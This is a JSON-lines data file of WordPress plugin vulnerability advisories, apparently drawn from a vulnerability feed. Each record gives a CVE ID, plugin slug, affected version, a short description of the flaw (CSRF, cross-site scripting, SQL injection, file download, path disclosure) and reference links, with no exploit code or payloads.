{"CVE_ID":"CVE-2021-4392","slug":"ecommerce-product-catalog","versionImpact":"2.9.43","description":"The eCommerce Product Catalog Plugin for WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.9.43. This is due to missing or incorrect nonce validation on the implecode_save_products_meta() function. This makes it possible for unauthenticated attackers to save product meta data via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2eb963dd-41c3-43cd-afb7-1be054829ea3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2eb963dd-41c3-43cd-afb7-1be054829ea3?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368356%40ecommerce-product-catalog&new=2368356%40ecommerce-product-catalog&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368356%40ecommerce-product-catalog&new=2368356%40ecommerce-product-catalog&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4500","slug":"order-tracking","versionImpact":"3.3.6","description":"The Order Tracking Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the order status parameter in versions up to, and including, 3.3.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers (admin or higher) to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/81f9a4c6-971f-4f6d-8bb1-e97bf75cf8d3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/81f9a4c6-971f-4f6d-8bb1-e97bf75cf8d3?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2959453%40order-tracking%2Ftrunk&old=2949611%40order-tracking%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2959453%40order-tracking%2Ftrunk&old=2949611%40order-tracking%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4514","slug":"mmm-file-list","versionImpact":"2.3","description":"The Mmm Simple File List WordPress plugin through 2.3 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/365b15e6-3755-4ed5-badd-c9dd962bd9fa\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/365b15e6-3755-4ed5-badd-c9dd962bd9fa\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3916","slug":"swift-framework","versionImpact":"2.7.31","description":"The Swift Framework plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several of the plugin's shortcodes in all versions up to, and including, 2.7.31 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Unfortunately, we did not receive a response from the vendor to send over the vulnerability details.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57103f8e-0874-4e56-8571-254607ada21c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57103f8e-0874-4e56-8571-254607ada21c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/swiftideas.com\\\/swift-framework\\\/\",\"name\":\"https:\\\/\\\/swiftideas.com\\\/swift-framework\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6546","slug":"one-click-close-comments","versionImpact":"2.7.1","description":"The One Click Close Comments plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 2.7.1. This is due to the plugin utilizing bootstrap and leaving test files with display_errors on. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/feb63b10-fe23-4f89-9ef3-0a61b4190320?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/feb63b10-fe23-4f89-9ef3-0a61b4190320?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/one-click-close-comments\\\/trunk\\\/tests\\\/bootstrap.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/one-click-close-comments\\\/trunk\\\/tests\\\/bootstrap.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7791","slug":"xpro-elementor-addons","versionImpact":"1.4.4.3","description":"The 140+ Widgets | Xpro Addons For Elementor \u2013 FREE plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018arrow\u2019 parameter within the Post Grid widget in all versions up to, and including, 1.4.4.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c6025dd5-a1d7-48cc-90b3-f020d3d2298b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c6025dd5-a1d7-48cc-90b3-f020d3d2298b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xpro-elementor-addons\\\/trunk\\\/widgets\\\/post-grid\\\/post-grid.php#L1891\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xpro-elementor-addons\\\/trunk\\\/widgets\\\/post-grid\\\/post-grid.php#L1891\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/xpro-elementor-addons\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/xpro-elementor-addons\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3141892\\\/#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3141892\\\/#file2\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3141892\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3141892\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8914","slug":"bck-tu-dong-xac-nhan-thanh-toan-chuyen-khoan-ngan-hang","versionImpact":"2.0.1","description":"The Thanh To\u00e1n Qu\u00e9t M\u00e3 QR Code T? \u00d0?ng \u2013 MoMo, ViettelPay, VNPay v\u00e0 40 ng\u00e2n h\u00e0ng Vi?t Nam plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 2.0.1 due to incorrect use of the wp_kses_allowed_html function, which allows the 'onclick' attribute for certain HTML elements without sufficient restriction or context validation. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ef7c48b-e8f2-40bd-aa48-191059e15453?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ef7c48b-e8f2-40bd-aa48-191059e15453?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bck-tu-dong-xac-nhan-thanh-toan-chuyen-khoan-ngan-hang\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bck-tu-dong-xac-nhan-thanh-toan-chuyen-khoan-ngan-hang\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bck-tu-dong-xac-nhan-thanh-toan-chuyen-khoan-ngan-hang\\\/trunk\\\/inc\\\/functions.php#L184\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bck-tu-dong-xac-nhan-thanh-toan-chuyen-khoan-ngan-hang\\\/trunk\\\/inc\\\/functions.php#L184\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9434","slug":"wpglobus-translate-options","versionImpact":"2.2.0","description":"The WPGlobus Translate Options plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.2.0. This is due to missing or incorrect nonce validation on the on__translate_options_page() function. This makes it possible for unauthenticated attackers to inject malicious web scripts and update plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ddca65fa-0744-4b2a-808c-a913586edc60?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ddca65fa-0744-4b2a-808c-a913586edc60?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpglobus-translate-options\\\/trunk\\\/includes\\\/class-wpglobus-translate-options.php#L442\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpglobus-translate-options\\\/trunk\\\/includes\\\/class-wpglobus-translate-options.php#L442\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11439","slug":"scancircle","versionImpact":"2.9.2","description":"The ScanCircle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'scancircle' shortcode in all versions up to, and including, 2.9.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/scancircle\\\/trunk\\\/scancircle.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/scancircle\\\/trunk\\\/scancircle.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3202428%40scancircle&new=3202428%40scancircle&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3202428%40scancircle&new=3202428%40scancircle&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/scancircle\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/scancircle\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/27cc6931-086c-43a5-965b-2a19f15bb356?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/27cc6931-086c-43a5-965b-2a19f15bb356?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8855","slug":"wp-auctions","versionImpact":"3.7","description":"The WordPress Auction Plugin WordPress plugin through 3.7 does not sanitize and escape a parameter before using it in a SQL statement, allowing editors and above to perform SQL injection attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/04084f2a-45b8-4249-a472-f156fad0c90a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/04084f2a-45b8-4249-a472-f156fad0c90a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0953","slug":"smtp-sendinblue","versionImpact":"1.1.1","description":"The SMTP for Sendinblue \u2013 YaySMTP plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.1.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smtp-sendinblue\\\/trunk\\\/includes\\\/Functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smtp-sendinblue\\\/trunk\\\/includes\\\/Functions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smtp-sendinblue\\\/trunk\\\/includes\\\/Helper\\\/Utils.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smtp-sendinblue\\\/trunk\\\/includes\\\/Helper\\\/Utils.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3234379\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3234379\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/smtp-sendinblue\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/smtp-sendinblue\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e7ba65ac-e568-4c13-961d-6453f281d9fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e7ba65ac-e568-4c13-961d-6453f281d9fc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13864","slug":"timer-countdown","versionImpact":"1.0","description":"The Countdown Timer WordPress plugin through 1.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b95b32b6-218a-4d02-b294-ab13458006b2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b95b32b6-218a-4d02-b294-ab13458006b2\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b95b32b6-218a-4d02-b294-ab13458006b2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b95b32b6-218a-4d02-b294-ab13458006b2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12301","slug":"jsp-store-locator","versionImpact":"1.0","description":"The JSP Store Locator WordPress plugin through 1.0 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5d93db07-415f-475b-a76d-2e12f849a4dc\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5d93db07-415f-475b-a76d-2e12f849a4dc\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7684","slug":"lastfm-recent-album-artwork","versionImpact":"1.0.2","description":"The Last.fm Recent Album Artwork plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.2. This is due to missing or incorrect nonce validation on the 'lastfm_albums_artwork.php' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastfm-recent-album-artwork\\\/trunk\\\/lastfm_albums_artwork.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastfm-recent-album-artwork\\\/trunk\\\/lastfm_albums_artwork.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/lastfm-recent-album-artwork\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/lastfm-recent-album-artwork\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bf6671d-f481-4fe5-b966-2591ab76b0b5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bf6671d-f481-4fe5-b966-2591ab76b0b5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0331","slug":"correos-oficial","versionImpact":"1.2.0.2","description":"The Correos Oficial WordPress plugin through 1.2.0.2 does not have an authorization check user input validation when generating a file path, allowing unauthenticated attackers to download arbitrary files from the server.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1b4dbaf3-1364-4103-9a7b-b5a1355c685b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1b4dbaf3-1364-4103-9a7b-b5a1355c685b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4348","slug":"ct-ultimate-gdpr","versionImpact":"2.4","description":"The Ultimate GDPR & CCPA plugin for WordPress is vulnerable to unauthenticated settings import and export via the export_settings & import_settings functions in versions up to, and including, 2.4. This makes it possible for unauthenticated attackers to change plugin settings and conduct attacks such as redirecting visitors to malicious sites.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40e2e8fb-ea36-4602-bead-8daf75d6dfb9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40e2e8fb-ea36-4602-bead-8daf75d6dfb9?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/critical-vulnerability-in-wordpress-ultimate-gdpr-ccpa-compliance-toolkit-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/critical-vulnerability-in-wordpress-ultimate-gdpr-ccpa-compliance-toolkit-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4391","slug":"woo-gift-cards-lite","versionImpact":"2.1.1","description":"The Ultimate Gift Cards for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.1.1. This is due to missing or incorrect nonce validation on the mwb_wgm_save_post() function. This makes it possible for unauthenticated attackers to modify product gift card details via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2da322ea-0206-4838-8ac4-9dd201bb00bc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2da322ea-0206-4838-8ac4-9dd201bb00bc?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-gift-cards-lite\\\/tags\\\/2.1.2\\\/admin\\\/class-woocommerce-gift-cards-lite-admin.php?rev=2549904#L461\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-gift-cards-lite\\\/tags\\\/2.1.2\\\/admin\\\/class-woocommerce-gift-cards-lite-admin.php?rev=2549904#L461\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4471","slug":" \torder-tracking","versionImpact":"3.3.6","description":"The Order Tracking Pro plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the start_date and end_date parameters in versions up to, and including, 3.3.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed64d0ff-4f49-4c18-86ec-2c6fbd559d2e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed64d0ff-4f49-4c18-86ec-2c6fbd559d2e?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2959453%40order-tracking%2Ftrunk&old=2949611%40order-tracking%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2959453%40order-tracking%2Ftrunk&old=2949611%40order-tracking%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-tracking\\\/trunk\\\/includes\\\/Export.class.php#L158\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-tracking\\\/trunk\\\/includes\\\/Export.class.php#L158\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4297","slug":"mmm-file-list","versionImpact":"2.3","description":"The Mmm Simple File List WordPress plugin through 2.3 does not validate the generated path to list files from, allowing any authenticated users, such as subscribers, to list the content of arbitrary directories.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9ff85b06-819c-459e-90a9-6151bfd70978\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9ff85b06-819c-459e-90a9-6151bfd70978\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3915","slug":"swift-framework","versionImpact":"2.7.31","description":"The Swift Framework plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the sf_edit_directory_item() function in all versions up to, and including, 2.7.31. This makes it possible for unauthenticated attackers to update arbitrary posts with arbitrary content. Unfortunately, we did not receive a response from the vendor to send over the vulnerability details.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/swiftideas.com\\\/swift-framework\\\/\",\"name\":\"https:\\\/\\\/swiftideas.com\\\/swift-framework\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/855055d5-362e-4a92-9e9d-97eab328dcc3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/855055d5-362e-4a92-9e9d-97eab328dcc3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
